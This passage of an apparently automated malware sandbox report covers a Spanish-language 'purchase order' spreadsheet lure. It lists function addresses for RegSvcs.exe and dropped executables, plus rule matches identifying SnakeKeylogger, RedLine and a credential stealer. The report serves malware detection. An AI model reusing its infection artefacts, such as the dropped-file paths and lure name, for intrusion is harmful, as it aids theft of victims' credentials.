                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D2C0809_2_00D2C080
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D2D3A89_2_00D2D3A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D2F3A89_2_00D2F3A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D2CD489_2_00D2CD48
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D2ED489_2_00D2ED48
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D2E0789_2_00D2E078
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D2DA109_2_00D2DA10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D24A189_2_00D24A18
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D265D09_2_00D265D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D2E6D09_2_00D2E6D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D2ABD89_2_00D2ABD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D2C6D89_2_00D2C6D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D245C09_2_00D245C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D272C89_2_00D272C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D208F09_2_00D208F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D288F09_2_00D288F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D215F79_2_00D215F7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D215F89_2_00D215F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D222FF9_2_00D222FF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D29EE09_2_00D29EE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D2ABE89_2_00D2ABE8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D2A7909_2_00D2A790
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D2B4979_2_00D2B497
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D2D39A9_2_00D2D39A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D204989_2_00D20498
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D2B4989_2_00D2B498
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D2F3989_2_00D2F398
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D2119F9_2_00D2119F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D258889_2_00D25888
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D22BB09_2_00D22BB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D291B09_2_00D291B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D238B79_2_00D238B7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D238B89_2_00D238B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D245BF9_2_00D245BF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D211A09_2_00D211A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D21EA79_2_00D21EA7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D21EA89_2_00D21EA8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D284A89_2_00D284A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D22BAF9_2_00D22BAF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D21A509_2_00D21A50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D227579_2_00D22757
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D227589_2_00D22758
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D262589_2_00D26258
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D28D589_2_00D28D58
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D2345F9_2_00D2345F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D200409_2_00D20040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D2B0409_2_00D2B040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D2624A9_2_00D2624A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D20D489_2_00D20D48
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D21A4F9_2_00D21A4F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D2C0769_2_00D2C076
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D258789_2_00D25878
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D234609_2_00D23460
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D29A609_2_00D29A60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D241679_2_00D24167
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D241689_2_00D24168
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D2E0689_2_00D2E068
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D23D109_2_00D23D10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D223009_2_00D22300
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D289009_2_00D28900
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D2DA009_2_00D2DA00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D230079_2_00D23007
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D230089_2_00D23008
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D296089_2_00D29608
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D23D0F9_2_00D23D0F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D2B0319_2_00D2B031
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D2A3389_2_00D2A338
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D2CD389_2_00D2CD38
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D2ED389_2_00D2ED38
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00D280289_2_00D28028
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_0133806011_2_01338060
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_013A204611_2_013A2046
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_0139829811_2_01398298
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_0136E4FF11_2_0136E4FF
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_0136676B11_2_0136676B
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_013C487311_2_013C4873
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_0135CAA011_2_0135CAA0
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_0133CAF011_2_0133CAF0
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_01366DD911_2_01366DD9
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_0134CC3911_2_0134CC39
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_0134B11911_2_0134B119
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_013391C011_2_013391C0
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_0135139411_2_01351394
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_0134120B11_2_0134120B
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_0135170611_2_01351706
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_0133792011_2_01337920
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_0134997D11_2_0134997D
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_013519B011_2_013519B0
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_0135781B11_2_0135781B
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_01357A4A11_2_01357A4A
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_01351C7711_2_01351C77
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_01357CA711_2_01357CA7
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_01351F3211_2_01351F32
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_013BBE4411_2_013BBE44
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_01369EEE11_2_01369EEE
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_005536F011_2_005536F0
                  Source: Orden de compra 0001-00255454.xlam.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: String function: 01010A30 appears 46 times
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: String function: 01339CB3 appears 31 times
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: String function: 0100F9F2 appears 40 times
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: String function: 01350A30 appears 46 times
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: String function: 00FF9CB3 appears 31 times
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: String function: 0134F9F2 appears 40 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0040E1D8 appears 44 times
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: String function: 029DC3A0 appears 34 times
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: String function: 029EFE30 appears 46 times
                  Source: sheet1.xml, type: SAMPLEMatched rule: INDICATOR_XML_LegacyDrawing_AutoLoad_Document author = ditekSHen, description = detects AutoLoad documents using LegacyDrawing
                  Source: 11.2.name.exe.560000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
